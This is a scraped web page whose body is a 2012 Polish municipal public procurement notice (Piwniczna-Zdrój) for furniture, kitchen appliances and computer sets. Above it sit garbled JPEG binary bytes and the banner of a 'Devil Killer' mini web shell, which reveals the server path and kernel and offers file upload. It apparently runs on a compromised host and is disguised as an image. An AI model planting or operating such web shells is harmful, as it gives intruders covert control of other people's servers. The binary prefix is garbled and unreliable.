JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/312012-N-2012.html

<p class="kh_header"><b>Piwniczna-Zdrój: Dostawa wyposażenia w ramach projektu  Zagospodarowanie terenu poprzez utworzenie parkingu              i miejsc rekreacyjnych wokół budynku gminnego pełniącego funkcję kulturalno-turystycznej  w Łomnicy Zdroju 2007-2013 oraz  Dostawa wyposażenia w ramach projektu  Budowa Świetlicy Środowiskowej       w Zubrzyku realizowanych w ramach działania 313,322,323 Odnowa i rozwój wsi objętego PROW na lata 2007-2013</b><br>
<b>Numer ogłoszenia: 312012 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Piwniczna-Zdrój , ul. Rynek 20, 33-350 Piwniczna-Zdrój, woj. małopolskie, tel. 0-18 4464043, faks 0-18 4464186.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.piwniczna.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia w ramach projektu  Zagospodarowanie terenu poprzez utworzenie parkingu              i miejsc rekreacyjnych wokół budynku gminnego pełniącego funkcję kulturalno-turystycznej  w Łomnicy Zdroju 2007-2013 oraz  Dostawa wyposażenia w ramach projektu  Budowa Świetlicy Środowiskowej       w Zubrzyku realizowanych w ramach działania 313,322,323 Odnowa i rozwój wsi objętego PROW na lata 2007-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający  dopuszcza możliwości składania ofert częściowych
 Zamówienie zostało podzielone na 4 części w zależności od miejsca wykonywania dostawy   i rodzaju dostawy




2. Opis przedmiotu zamówienia: 


I . Przedmiotem zamówienia jest dostawa wyposażenia w ramach etapu II zadania - rozbudowa                           i przebudowa istniejącego budynku wraz ze zmianą jego sposobu użytkowania na ośrodek turystyczno - kulturalny wraz z instalacjami wewnętrznymi (wod-kan, co, elektryczną) z elementami zagospodarowania terenu i infrastrukturą techniczna tj. przyłącz energetyczny oraz przyłącz kanalizacji deszczowej na działkach nr 2735)4 i 2738)4 położonych w Łomnicy Zdroju oraz  dostawa wyposażenia dla świetlicy środowiskowej w Zubrzyku

Zadanie obejmuje:

Część 1 . Dostawa wyposażenia w  meble , sprzęt AGD wraz z jego montażem i pierwszym uruchomieniem w  Świetlicy Łomnica   

Lp.	 ( wymiary orientacyjne)	 j.m	ilość	Wymóg minimalny
1	biurko proste 120*80*75	szt	5	płyta wiórowa laminowana, nogi metalowe kolor: orzech lub calvados, olcha
2	krzesło biurkowe obrotowe 75*5*105	szt	5	obicie tapicerowane, obrotowe, kółka
3	Krzesło konferencyjne 55*50*77	szt	11	obicie tapicerowane, nogi metalowe
4	panel dzielący 120*55	kpl	2	stanowiący komplet do biurka
5	panel dzielący 80*55	kpl	2	stanowiący komplet do biurka
6	stół 74*74*75	szt	5	płyta wiórowa laminowana, nogi metalowe lub drewniane kolor: orzech lub calvados, olcha
7	Lada	kpl	1	płyta wiórowa laminowana, wg własnego projektu stanowiąca wykończenie aneksu kuchennego kolor: orzech lub calvados, olcha
8	blat kuchenny 246*62	szt	3	Komplet do aneksu kuchennego
9	szafka stojąca 60*60*86 i 80*60*86 kuchenna	szt	9	Komplet do aneksu kuchennego płyta MDF
10	szafka ścienna wisząca 70*37*40 kuchenna	szt	6	Komplet do aneksu kuchennego płyta MDF
11	szafka stojąca narożna kuchenna	szt	1	Komplet do aneksu kuchennego płyta MDF
12	stół do tenisa 274*152*76	szt	1	materiał płyty: płyta MDF klejona, kółka: 8 kółek transportowych, skrętnych, gumowych o średnicy 50 mm boczna osłona, dodatkowe wsporniki ,możliwość postawienia ścianki treningowej, w komplecie: siatka, 2 rakietki, 3 piłeczki, stół zgodny z normą jakości DIN EN 14468
13	stolik piłkarski 68*136*88	szt	1	Pole gry: 118 x 68 cm  Waga: 48,5 kg  Pokryta laminatem płyta z MDF  Gumowe,przeciwpoślizgowe  uchwyty  Grubość płyty gry: 15 mm  Prowadnice: nierdzewna stal, 16 mm  Zawodnicy zabezpieczeni gumowymi stoperami  Dwie poprzeczki stabilizujące  Regulowana wysokość nóg 
14	łóżka (rama i materac) 207*98*45	szt	1	rama drewniana , materac sprężynowy
15	komoda 66*42*100	szt	3	3 drzwiowa , płyta wiórowa laminowana lub MDF, kolor: calvados, olcha
16	szafa ubraniowa 120*55*200	szt	1	2 drzwiowa z drążkiem oraz półką, płyta wiórowa laminowana lub MDF, kolor: calvados, olcha
17	krzesło 60*55*83	szt	8	obicie tapicerowane , nogi metalowe, bez podłokietników
18	blat kuchenny 186*62	szt	1	
19	kontener 43*54*63	szt	1	podbiórkowy z szufladami kolor: orzech lub calvados, olcha
20	regał aktowy 80*40*187	szt	3	Góra otwarta z 3 półkami.Dół zamykany z 1 półką. rozstaw półek na wysokość segregatora A4 (min. 33cm) kolor: orzech lub calvados, olcha
21	szafa ubraniowa 80*40*187	szt	1	2 drzwiowa. Zamykana na zamek. kolor: orzech lub calvados, olcha
22	osłona biurka 	szt	1	stanowiąca kpl do biurka
23	witryna chłodnicza 450-500 litrów	szt	1	z drzwiami przeszklonymi i półkami, klasa energetyczna A
24	lodówka zintegrowana 59,6*54*81,9	szt	2	klasa energetyczna A
25	zmywarka zintegrowana 51,6*55*81,8	szt	1	klasa energetyczna A


Część 2  Dostawę sprzętu komputerowego z oprogramowaniem wraz z montażem i pierwszym uruchomieniem w Świetlicy Łomnica  



zestaw komputerowy 	kpl	5	
 
Lp.	Nazwa parametru	Wymóg minimalny parametrów technicznych i funkcjonalnych
1	Płyta główna	Obsługa Procesorów:- wsparcie dla procesorów z serii LGA1155 Intel R Core TM i7 ) Intel R Core  TM i5 Procesory ) Intel R Core TM i3 ) Intel R Pentium R ) Intel R Celeron RChipset- umożliwiający poprawną współpracę procesora i płyty głównej;liczba gniazd procesorów: 1 szt;.Preferowany producent chipsetu: Intel RObsługa pamięci- min. 2 złącza pamięci 1,5V DDR3 DIMM (obsługa do 16 GB pamięci)- dwukanałowa obsługa pamięci DDR3 1333)1066)800 MHz- obsługa pamięci non-ECCWyjścia graficzne- 1 x DVI-D port, supporting a maximum resolution of 1920x1200- 1 x port D-SubUkład audio- układ min. Realtek ALC889- obsługa High Definition AudioLAN- karta sieciowa o predkości 10)100)1000 MbitZłącza rozszerzeńSlot 1x PCI Express x 16 (x16), 3 złącza PCI Express x1 (Wszystkie złącza PCI Express odpowiadają standardowi PCI Express 2.0.). Złącza SATA4 złącza SATA 3Gb)s. USB 2.0)1.1  - wbudowane min. 2 złącza, min 4 złącza zewnętrzne.Wewnętrzne złącza wejścia/wyjściazłącze wentylatora systemowego, złącze front panel audio, 24-pinowe złącze zasilania ATX, złącze portu równoległego, złącze panelu przedniego,  złącze wentylatora procesora, złącze portu szeregowego, złącze dla czujnika otwarcia obudowy,  złącze power LED,  złącze zasilania 4-pin ATX 12V.Złącza wejścia)wyjścia na tylnym paneluZłącze PS)2 port klawiatury, port myszy PS/2, złącze DVI-D, złącze D-Sub3 gniazdka audio (wejście liniowe) wyjście liniowe)mikrofon), złącze  RJ45 LAN, Kontroler I)O iTE IT8728Dołączone elementy montażowe: kable HDD, FDD, CD oraz wszystkie innedołączane przez producenta płyty głównej;Dołączone przez producenta sterowniki i oprogramowanie
2	Procesor	podstawka pod procesor: LGA1155;prędkość procesora: nie mniejsza niż 2.6 GHz;wielkość pamięci cache procesora L3- nie mniejsza niż 3MB; L2 - min. 512kB, częstotliwość FSB: nie mniejsza niż 800 FSB;liczba rdzeni procesora: 2 szt., wersja procesora: BOX;
3	Pamięć operacyjna RAM	typ pamięci: DDR3 min. 1333MHz;pojemność pojedynczego modułu pamięci: 4GB
4	Dysk twardy	typ dysku: wewnętrzny 3,5;pojemność: min. 320GB;interfejs: Serial ATA;prędkość obrotowa: 7200RPM;cache: min. 8MB;
5	Napęd optyczny	typ napędu: DVD?RW, wewnętrzny 5,25;prędkość odczytu DVD: 16x; prędkość zapisu DVD-R: min. 16xinterfejs: SATA;
6	Obudowa komputerowa	typ obudowy: Midi lub Mini Tower;obsługiwane typy płyty głównej: ATX , Micro ATX;zasilacz: min. 400W zgodny z procesorami Intela Pentium IV;wyjścia portów z przodu obudowy: 2x USB; Audiokolor obudowy: czarny
7	Klawiatura komputerowa	typ klawiatury: zwykła przewodowa;typ złącza: USB lub PS2;
8	Mysz komputerowa 	typ: standardowa przewodowa optyczna;typ złącza: PS2 lub USB;liczba przycisków: 3 szt.;liczba pokręteł: 1 szt.;
9	Oprogramowanie	Microsoft Windows 7 Home Premium 64 PL oraz zestaw płytumożliwiający przywrócenie systemu,Oprogramowanie do nagrywania płyt zgodne z oferowaną nagrywarką 
10	Gwarancja	36 miesięcy
11	Kamera internetowa	Połączenia wideo (o rozdzielczości 640 x 480 pikseli) przy zalecanym systemie Nagrania wideo: do 1024 x 768 pikseli Zdjęcia: do 5 megapikseli (wspomagane oprogramowaniem) Certyfikat zgodności ze standardem Hi-Speed USB 2.0 (zalecany) Uniwersalny zaczep pasujący do monitorów LCD i CRT oraz do laptopów
12	Słuchawki z mikrofonem	Impedancja  50 Ohm  Połączenie Przewodowe  Pasmo przenoszenia 20 - 20000 HzCzułość  100dB ) mW ?3dBZ mikrofonem Tak  Długość przewodu min. 1.5 m  Pozostałe parametry Maksymalna moc wejściowa: 100 mw
13	Monitor	Format ekranu: panoramiczny  Przekątna ekranu: min 20  Typ matrycy: TFT-TN  Ekran dotykowy: Nie  Technologia podświetlania: Diody LED  Rozdzielczość: min. 1600 x 900Czas reakcji:  5 s  Jasność: min. 200 cd)m2  Gniazda wejściowe 15-pin D-Sub DVIWbudowane głośniki: nie  Wbudowany tuner TV: brak  Certyfikaty  


Cześć 3  Dostawę wyposażenia: meble , wraz z  montażem Świetlica Zubrzyk ( wymiary orientacyjne)  


Lp.	( wymiary orientacyjne)	 j.m	ilość	Wymóg minimalny
1	biurko proste 120*80*75	szt	8	płyta wiórowa laminowana, nogi metalowe kolor: orzech lub calvados, olcha
2	krzesło biurkowe obrotowe 75*5*105	szt	8	obicie tapicerowane, obrotowe, kółka
3	Krzesło konferencyjne 55*50*77	szt	55	obicie tapicerowane , nogi metalowe, bez podłokietników
4	Krzesło konferencyjne 60*55*83	szt	4	obicie tapicerowane , nogi metalowe
5	panel dzielący 120*55	kpl	4	stanowiący komplet do biurka
6	panel dzielący 80*55	kpl	6	stanowiący komplet do biurka
7	stół konferencyjny 195*110	szt	2	płyta wiórowa laminowana, nogi metalowe kolor: orzech lub calvados, olcha
8	lada 150*70*110	kpl	2	płyta wiórowa laminowana, wg własnego projektu stanowiąca wykończenie szatni kolor: orzech lub calvados, olcha
9	listwa ścienna z wieszakami 	kpl	2	wieszaki metalowe po 25szt



Część 4  Dostawa sprzętu komputerowego z oprogramowaniem wraz z montażem i pierwszym uruchomieniem w  świetlicy środowiskowej w Zubrzyku  

zestaw komputerowy	kpl	8	
Lp.	Nazwa parametru	Wymóg minimalny parametrów technicznych i funkcjonalnych 
1	Płyta główna	Obsługa Procesorów:- wsparcie dla procesorów z serii LGA1155 Intel R Core TM i7 ) Intel R Core TM  i5 Procesory )Intel R Core TM  i3 )Intel R Pentium R ) Intel R Celeron RChipset- umożliwiający poprawną współpracę procesora i płyty głównej;liczba gniazd procesorów: 1 szt;.Preferowany producent chipsetu: Intel RObsługa pamięci- min. 2 złącza pamięci 1,5V DDR3 DIMM (obsługa do 16 GB pamięci)- dwukanałowa obsługa pamięci DDR3 1333)1066)800 MHz- obsługa pamięci non-ECCWyjścia graficzne- 1 x DVI-D port, supporting a maximum resolution of 1920x1200- 1 x port D-SubUkład audio- układ min. Realtek ALC889- obsługa High Definition AudioLAN- karta sieciowa o predkości 10)100)1000 MbitZłącza rozszerzeńSlot 1x PCI Express x 16 (x16), 3 złącza PCI Express x1 (Wszystkie złącza PCI Express odpowiadają standardowi PCI Express 2.0.). Złącza SATA4 złącza SATA 3Gb)s. USB 2.0)1.1  - wbudowane min. 2 złącza, min 4 złącza zewnętrzne.Wewnętrzne złącza wejścia)wyjściazłącze wentylatora systemowego, złącze front panel audio, 24-pinowe złącze zasilania ATX, złącze portu równoległego, złącze panelu przedniego,  złącze wentylatora procesora, złącze portu szeregowego, złącze dla czujnika otwarcia obudowy,  złącze power LED,  złącze zasilania 4-pin ATX 12V.Złącza wejścia)wyjścia na tylnym paneluZłącze PS/2 port klawiatury, port myszy PS)2, złącze DVI-D, złącze D-Sub3 gniazdka audio (wejście liniowe) wyjście liniowe)mikrofon), złącze  RJ45 LAN, Kontroler I)O iTE IT8728Dołączone elementy montażowe: kable HDD, FDD, CD oraz wszystkie innedołączane przez producenta płyty głównej;Dołączone przez producenta sterowniki i oprogramowanie
2	Procesor	podstawka pod procesor: LGA1155;prędkość procesora: nie mniejsza niż 2.6 GHz;wielkość pamięci cache procesora L3- nie mniejsza niż 3MB; L2 - min. 512kB, częstotliwość FSB: nie mniejsza niż 800 FSB;liczba rdzeni procesora: 2 szt., wersja procesora: BOX;
3	Pamięć operacyjna RAM	typ pamięci: DDR3 min. 1333MHz;pojemność pojedynczego modułu pamięci: 4GB
4	Dysk twardy	typ dysku: wewnętrzny 3,5);pojemność: min. 320GB;interfejs: Serial ATA;prędkość obrotowa: 7200RPM;cache: min. 8MB;
5	Napęd optyczny	typ napędu: DVD?RW, wewnętrzny 5,25);prędkość odczytu DVD: 16x; prędkość zapisu DVD-R: min. 16xinterfejs: SATA;
6	Obudowa komputerowa	typ obudowy: Midi lub Mini Tower;obsługiwane typy płyty głównej: ATX , Micro ATX;zasilacz: min. 400W zgodny z procesorami Intela Pentium IV;wyjścia portów z przodu obudowy: 2x USB; Audiokolor obudowy: czarny
7	Klawiatura komputerowa	typ klawiatury: zwykła przewodowa;typ złącza: USB lub PS2;
8	Mysz komputerowa 	typ: standardowa przewodowa optyczna;typ złącza: PS2 lub USB;liczba przycisków: 3 szt.;liczba pokręteł: 1 szt.;
9	Oprogramowanie	Microsoft Windows 7 Home Premium 64 PL oraz zestaw płytumożliwiający przywrócenie systemu,Oprogramowanie do nagrywania płyt zgodne z oferowaną nagrywarką 
10	Gwarancja	36 miesięcy
11	Kamera internetowa	Połączenia wideo (o rozdzielczości 640 x 480 pikseli) przy zalecanym systemie Nagrania wideo: do 1024 x 768 pikseli Zdjęcia: do 5 megapikseli (wspomagane oprogramowaniem) Certyfikat zgodności ze standardem Hi-Speed USB 2.0 (zalecany) Uniwersalny zaczep pasujący do monitorów LCD i CRT oraz do laptopów
12	Słuchawki z mikrofonem	Impedancja  50 Ohm  Połączenie Przewodowe  Pasmo przenoszenia 20 - 20000 HzCzułość  100dB ) mW ?3dBZ mikrofonem Tak  Długość przewodu min. 1.5 m  Pozostałe parametry Maksymalna moc wejściowa: 100 mw
13	Monitor	Format ekranu: panoramiczny  Przekątna ekranu: min 20   Typ matrycy: TFT-TN  Ekran dotykowy: Nie  Technologia podświetlania: Diody LED  Rozdzielczość: min. 1600 x 900Czas reakcji:  5 s  Jasność: min. 200 cd)m2  Gniazda wejściowe 15-pin D-Sub DVIWbudowane głośniki: nie  Wbudowany tuner TV: brak  Certyfikaty  


1.Wszystkie oferowane materiały muszą być fabryczne nowe, nieregenerowane, wolne od wad fizycznych                    i prawnych, nie mają do nich praw osoby trzecie oraz nie jest przedmiotem żadnego postępowania                                  i zabezpieczenia.
2.W przypadku wskazania w opisie przedmiotu zamówienia , oraz  w załączniku nr 1 do oferty , znaku towarowego, patentu lub pochodzenia służy jedynie do celów identyfikacyjnych, do określenia ich kompatybilności. Nazwy stanowią jedynie precyzyjne określenie klasy oraz parametrów technicznych produktów wymaganych przez Zamawiającego. w myśl art.29 ust.3 ustawy Prawo zamówień publicznych - zamawiający dopuszcza możliwość składania ofert jakościowo równoważnych, spełniających równoważne parametry określone w opisie oraz  w załączniku nr 1 do oferty.
3.Przez produkt równoważny Zamawiający rozumie produkt kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych w stosunku do oryginału produktu przez producenta urządzenia.
4.Wszelkie roboty winny być prowadzone pod nadzorem osób posiadających stosowną wiedze i umiejętności.
5.Materiały i wyroby budowlane winny być odpowiednio oznaczone i posiadać wszelkie dokumenty określone szczegółowymi przepisami dotyczącymi trybu dopuszczenia ich do stosowania jak: certyfikat na znak bezpieczeństwa, aktualną aprobatę techniczną, deklarację zgodności z Polską Normą, atest higieniczny, określenie klasyfikacji ogniowej , gwarancje itp.

Kody Wspólnego Słownika Zamówień:

39150000-8 Różne meble i wyposażenie
30200000-1 Urządzenia komputerowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie  wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez wykonawcę realizacji co najmniej  1 zamówienia 


Dla Części 1	W zakresie wyposażenia w meble , sprzęt AGD wraz z jego montażem i pierwszym uruchomieniem	O łącznej wartość niemniejszej niż  15000,00 zł brutto
Dla Części 2	W zakresie wyposażenia w sprzęt komputerowy       z oprogramowaniem wraz     z montażem                           i pierwszym uruchomieniem.	O łącznej wartość niemniejszej niż  5000,00 zł brutto
Dla Części 3	W zakresie wyposażenia w meble  wraz                 z  montażem 	 O łącznej wartość niemniejszej niż  9000,00 zł brutto
Dla Części 4	W zakresie wyposażenia w sprzęt komputerowy                   z oprogramowaniem wraz    z montażem                     i pierwszym uruchomieniem.	O łącznej wartość niemniejszej niż  7000,00 zł brutto

w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

